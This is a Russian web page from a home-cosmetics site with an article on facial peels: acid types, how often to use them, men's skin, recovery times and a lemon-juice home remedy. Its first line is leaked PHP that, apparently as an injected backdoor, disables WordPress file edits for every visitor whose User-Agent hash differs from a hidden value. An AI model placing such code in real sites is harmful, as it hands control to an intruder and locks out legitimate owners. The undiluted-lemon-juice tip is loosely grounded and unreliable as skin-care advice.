if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Пилинг лица: особенности и советы | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Пилинг лица: особенности и советы

Раньше пилинги назначались женщинам постарше, ведь их целью было вернуть молодость. Сейчас все изменилось. Читайте подробнее про особенности пилинга и советы при его проведении

Осен­няя пора иде­аль­но под­хо­дит для про­ве­де­ния пилин­гов. Рань­ше пилин­ги назна­ча­лись жен­щи­нам постар­ше, ведь их целью было вер­нуть моло­дость. В наше вре­мя дан­ная про­це­ду­ра попу­ляр­на и сре­ди моло­де­жи, она поз­во­ля­ет решить про­бле­мы кожи — угри, акне и прочие.

Не сто­ит путать пилинг со скра­бом, так как послед­ний лишь сни­ма­ет тон­кий поверх­ност­ный слой кожи, и он не име­ет вос­ста­но­ви­тель­но­го пери­о­да. Для ухо­да за кожей с помо­щью пилин­га сей­час не надо идти к кос­ме­то­ло­гу, мож­но купить сред­ство и в спе­ци­а­ли­зи­ро­ван­ных мага­зи­нах или апте­ках. Толь­ко сле­ду­ет обра­тить вни­ма­ние на содер­жа­ние кис­ло­ты и ее про­цент­ное соот­но­ше­ние. Это может быть гли­ко­ли­е­вая, фрук­то­вая, кой­е­вая и фети­ко­вая кислоты.

Чем сла­бее дей­ству­ет кис­ло­та, тем быст­рее прой­дет вос­ста­нов­ле­ние после про­це­ду­ры. Чаще чем раз в неде­лю пилин­ги делать не реко­мен­ду­ет­ся спе­ци­а­ли­ста­ми в сфе­ре косметологии.

Уход за кожей лица муж­чи­нам так­же необ­хо­дим, как и жен­щи­нам, поэто­му пилин­гом могут поль­зо­вать­ся и пред­ста­ви­те­ли силь­но­го пола. По срав­не­нию с жен­ским, их верх­ний слой кожи доста­точ­но плот­ный и жир­ный. Из-за еже­днев­но­го бри­тья, зона угол­ков рта и ску­ло­вой зоны доста­точ­но исто­че­на и эти участ­ки не тре­бу­ют к себе тако­го вни­ма­ния, как лоб или нос.

Для кос­ме­ти­ки в домаш­них усло­ви­ях подой­дет лимон, он име­ет очи­ща­ю­щее и отбе­ли­ва­ю­щее свой­ство. Сле­ду­ет смо­чить сал­фет­ку в его нераз­бав­лен­ном соке и про­ти­рать лицо. Когда кожа немно­го под­сох­ла, при­мер­но через 10 минут, лицо необ­хо­ди­мо умыть и нане­сти любой увлаж­ня­ю­щий крем.

Суще­ству­ет несколь­ко сове­тов по про­ве­де­нию пилин­гов  от про­фес­си­о­на­лов. Дан­ная про­це­ду­ра име­ет не толь­ко омо­ла­жи­ва­ю­щий эффект, но и спра­вит­ся с руб­це­ва­ни­ем кожи, рас­тяж­ка­ми и угре­вой сыпью. Лег­кий пилинг мож­но про­во­дить и в домаш­них усло­ви­ях, но сна­ча­ла луч­ше про­кон­суль­ти­ро­вать­ся с вра­чом или косметологом.

Людям, стра­да­ю­щим дер­ма­ти­том и име­ю­щие любые повре­жде­ния кожи, пилинг кате­го­ри­че­ски про­ти­во­по­ка­зан. Он может ухуд­шить состо­я­ние кожи.

Если муж­чи­на решил­ся на эту про­це­ду­ру, то надо забыть о бри­тье на несколь­ко дней. Сто­ит сде­лать себе замет­ку о вос­ста­но­ви­тель­ном пери­о­де после пилин­га. При лег­кой про­це­ду­ре сня­тия верх­не­го слоя эпи­дер­ми­са, кожа будет вос­ста­нав­ли­вать­ся око­ло двух недель. А при глу­бо­ком пилин­ге – более меся­ца. Во вре­мя это­го пери­о­да нуж­но забыть про пыль­ные поме­ще­ния, пря­мые сол­неч­ные лучи и поль­зо­вать­ся анти­бак­те­ри­аль­ной косметикой.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Лиана Сергеевна

Так мерзну осенью и зимой, что очень захотелось поделиться с вами рецептами домашней косметики, которую можно сделать своими руками! Читайте все мои записи!